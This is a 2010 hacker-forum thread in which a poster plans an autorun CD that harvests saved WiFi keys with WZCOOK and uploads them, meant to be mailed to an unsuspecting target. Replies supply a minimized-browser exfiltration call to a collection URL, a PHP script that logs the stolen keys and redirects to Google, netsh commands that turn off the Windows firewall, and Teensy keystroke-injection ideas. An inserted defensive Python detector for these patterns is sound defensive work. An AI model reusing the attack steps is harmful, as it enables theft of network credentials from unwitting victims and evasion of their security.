RiverJumper, posted October 18, 2010

Sup everybody. First, sorry if I mess up something, but this is my first post over here. What I was trying to make was an autorunning CD that recovers all the WiFi keys and then uploads them to the internet. I found a program called WZCOOK.exe from the aircrack-ng suite that extracts all the keys and stores them in a wepkeys.txt file in C:\

What I managed to do is write a batch file that just autoruns the program and then uploads the file through FTP. I only have two problems remaining to be solved:

1) How to background all the work
2) The Windows firewall caught the outbound connection

Thanks for all the suggestions.

RiverJumper

Trip, posted October 18, 2010

Why not pass the keys in a URL? Call a browser page called log.php?key=iowejdwiowdewio, store it to a db ... then redirect them to Google? This wouldn't get caught by the firewall, but there is a chance they might see it.

You could try

    start /min iexplorer.exe "http://www.yoursite.com/log.php?='strvar'"

That's one way. If only you could edit the Windows firewall rules on the fly, that'd be handy.

Infiltrator, posted October 20, 2010

Nice tool, hope they can implement that in Metasploit or Backtrack as well. It would make capturing WPA keys so much easier.

RiverJumper (Author), posted October 20, 2010

> Why not pass the keys in a URL? Call a browser page called log.php?key=iowejdwiowdewio, store it to a db ... then redirect them to Google? This wouldn't get caught by the firewall, but there is a chance they might see it.
>
> You could try
>
>     start /min iexplorer.exe "http://www.yoursite.com/log.php?='strvar'"
>
> That's one way. If only you could edit the Windows firewall rules on the fly, that'd be handy.

I'm sorry but I'm not that familiar with PHP, so I would be happy if you could explain yourself a little bit better... I don't really ask for spoon feeding, it's just that I'm new to programming & Co...

In the meantime, looking it up on Google I found this:

* Disable Windows XP firewall

      netsh firewall set opmode disable

* Enable the Windows XP firewall

      netsh firewall set opmode enable

I will try to integrate this in a couple of hours and I'll let you know if it succeeds or not. Though this is just for Windows Firewall, while your idea dribbles any kind of wall... so it's still interesting.

> Nice tool, hope they can implement that in Metasploit or Backtrack as well. It would make capturing WPA keys so much easier.

I know, I was surprised too when I found out there was pretty much nothing on the net about it! Dunno if it's against the forum's rules, but maybe if something works out, I'd like to post it over here, as some kind of thanks for the help.

Edited October 20, 2010 by RiverJumper

dr0p, posted October 20, 2010

    <?php
    $key = $_GET['key'];
    $fh = fopen('keys.txt', 'a');
    fwrite($fh, $key . "\n");
    fclose($fh);
    ?>

That would log the keys to a text file (assuming I didn't make any typos). Of course, you would still need to code something that connected to the server and sent the key. This could be done quite easily using the .NET framework or a scripting language such as perl or python.

c0r, posted October 20, 2010

This helped me disable the Windows firewall on a victim's Windows box:

Netsh commands
Netsh firewall c

Trip, posted October 20, 2010

Yeah ... txt file is much simpler than db. Here's my little edit ...

    <html>
    <head>
    <?php
    $key = $_GET['key'];
    $fh = fopen('keys.txt', 'a');
    fwrite($fh, $key . "\n");
    fclose($fh);
    header('Location: http://www.google.com/');
    ?>
    </head>
    <body></body>
    </html>

and

> * Disable Windows XP firewall
>
>       netsh firewall set opmode disable
>
> * Enable the Windows XP firewall
>
>       netsh firewall set opmode enable

Sweet, thanks for the tip.

Edited October 20, 2010 by Trip

RiverJumper (Author), posted October 21, 2010

>     <?php
>     $key = $_GET['key'];
>     $fh = fopen('keys.txt', 'a');
>     fwrite($fh, $key . "\n");
>     fclose($fh);
>     ?>
>
> That would log the keys to a text file (assuming I didn't make any typos). Of course, you would still need to code something that connected to the server and sent the key. This could be done quite easily using the .NET framework or a scripting language such as perl or python.

Correct me if I'm wrong, but this would "dump" the keys in a txt file. I already found wzcook.exe for doing it, so why should I use this? Anyway, thanks for the help, but as I said before I'm not that familiar with this...

> This helped me disable the Windows firewall on a victim's Windows box:
>
> Netsh commands
> Netsh firewall c

Thanks for the tip. Are they the same commands I posted above? Or like a better version of it working on Vista too?

> Yeah ... txt file is much simpler than db. Here's my little edit ...
>
>     <html>
>     <head>
>     <?php
>     $key = $_GET['key'];
>     $fh = fopen('keys.txt', 'a');
>     fwrite($fh, $key . "\n");
>     fclose($fh);
>     header('Location: http://www.google.com/');
>     ?>
>     </head>
>     <body></body>
>     </html>
>
> and
>
> Sweet, thanks for the tip.

What does the string you added mean? And you were talking before about a way to pass the keys through a URL, can you explain this to me a little bit better please?

P.S. You're welcome man! As they say, Share the Knowledge! Anyway, that command works wonderfully. Just run it even from autorun and the Windows firewall will never bother you again. Microsoft should be ashamed of themselves for making it so easy.

Edited October 21, 2010 by RiverJumper

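
Added example, not part of any post in this thread: seen from the defending side, the firewall command and the minimized-browser idea discussed above both leave a process-creation trail that can be matched and correlated. The pipe-delimited log format, the collector.example host and the finding names are constructed for illustration, and the advfirewall pattern goes beyond the legacy command quoted in the thread.

```python
import re
from datetime import datetime
# Constructed process-creation events: time|parent|image|command line
SAMPLE_EVENTS = r"""
2010-10-21T10:02:12|cmd.exe|C:\Windows\System32\netsh.exe|netsh firewall set opmode disable
2010-10-21T10:02:13|cmd.exe|C:\Program Files\Internet Explorer\iexplore.exe|iexplore.exe "http://collector.example/log.php?key=CONSTRUCTED"
2010-10-21T10:05:40|explorer.exe|C:\Program Files\Internet Explorer\iexplore.exe|iexplore.exe http://www.google.com/
2010-10-21T10:07:02|services.exe|C:\Windows\System32\netsh.exe|netsh advfirewall show allprofiles
2010-10-21T10:09:30|cmd.exe|C:\Windows\System32\netsh.exe|NETSH AdvFirewall set allprofiles state off
"""

# Legacy form quoted in the thread, plus the Vista+ advfirewall form (added here).
FIREWALL_OFF = [
    re.compile(r"\bnetsh(\.exe)?\s+firewall\s+set\s+opmode\s+(mode\s*=\s*)?disable\b", re.I),
    re.compile(r"\bnetsh(\.exe)?\s+advfirewall\s+set\s+\w+\s+state\s+off\b", re.I),
]
BROWSERS = {"iexplore.exe", "firefox.exe", "chrome.exe"}
SCRIPT_PARENTS = {"cmd.exe", "wscript.exe", "cscript.exe", "powershell.exe"}
URL_WITH_QUERY = re.compile(r"https?://[^\s\"']+\?[^\s\"']+", re.I)

def classify(parent, image, cmdline):
    """Return the finding names raised by one process-creation event."""
    findings = []
    if any(p.search(cmdline) for p in FIREWALL_OFF):
        findings.append("firewall_disabled_via_netsh")
    exe = image.rsplit("\\", 1)[-1].lower()
    if (exe in BROWSERS and parent.lower() in SCRIPT_PARENTS
            and URL_WITH_QUERY.search(cmdline)):
        findings.append("browser_query_url_from_script")
    return findings

def scan(log_text):
    """Return (timestamp, finding) tuples for every flagged event."""
    alerts = []
    for line in log_text.strip().splitlines():
        ts, parent, image, cmdline = line.split("|", 3)
        alerts += [(ts, name) for name in classify(parent, image, cmdline)]
    return alerts

def correlate(alerts, window_seconds=60):
    """Pair each firewall disable with a scripted browser launch soon after."""
    t = datetime.fromisoformat
    fw = [ts for ts, n in alerts if n == "firewall_disabled_via_netsh"]
    br = [ts for ts, n in alerts if n == "browser_query_url_from_script"]
    return [(f, b) for f in fw for b in br
            if 0 <= (t(b) - t(f)).total_seconds() <= window_seconds]

if __name__ == "__main__":
    print(scan(SAMPLE_EVENTS), correlate(scan(SAMPLE_EVENTS)))
```

The correlated pair is the higher-confidence signal; a firewall disable on its own still deserves review, since the benign `show` query and the user-launched browser in the sample are not flagged.
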
RiverJumper (Author), posted October 21, 2010

Moderators delete this useless post please... I've made an error double posting....

Edited October 21, 2010 by RiverJumper

digip, posted October 21, 2010

Are we talking physical access to the machine, or creating the tool on a CD you give to people? If you have physical access to the machine, it's pretty much game over anyway. It would probably be easier to use something like the Teensy USB/rubber ducky device to plug it in, have it type out the commands and dump the keys from the registry back onto the thumbdrive and then be done with it. Much quicker and safer than trying to insert a CD and upload files to the internet. If the machine has PowerShell installed, you can escalate admin level privileges to the system as demonstrated by Dave Kennedy and Iron Geek's Teensy USB, you could pretty much do anything at that point.

Video Demo - http://vimeo.com/14581715

RiverJumper (Author), posted October 22, 2010

> Are we talking physical access to the machine, or creating the tool on a CD you give to people? If you have physical access to the machine, it's pretty much game over anyway. It would probably be easier to use something like the Teensy USB/rubber ducky device to plug it in, have it type out the commands and dump the keys from the registry back onto the thumbdrive and then be done with it. Much quicker and safer than trying to insert a CD and upload files to the internet. If the machine has PowerShell installed, you can escalate admin level privileges to the system as demonstrated by Dave Kennedy and Iron Geek's Teensy USB, you could pretty much do anything at that point.
>
> Video Demo - http://vimeo.com/14581715

If I had physical access to it, I would use a normal USB with wzcook and the game was easily over. I think wzcook does not need admin powers to act. Not sure about it, but mostly many people have their only account already logged in with administration privileges.

Anyway, thanks for this tip. I'm gonna buy a Teensy USB a day of those, also 'cause you can have some with your PS3 too with it.

To be really clear: I'm talking about dropping a 0.15 € CD in my "grandma's" mailbox with something like "Best sawing tools" and make the game be.

Edited October 22, 2010 by RiverJumper

Infiltrator, posted October 24, 2010

> I think wzcook does not need admin powers to act. Not sure about it, but mostly many people have their only account already logged in with administration privileges.

Not everyone logs in as an administrator. Especially in a corporate network, everyone has very tight permissions and access to their machines. So unless you plan on attacking a friend or someone who has no idea of computer security, using the method digip suggested is a must. Just something to keep an eye out for.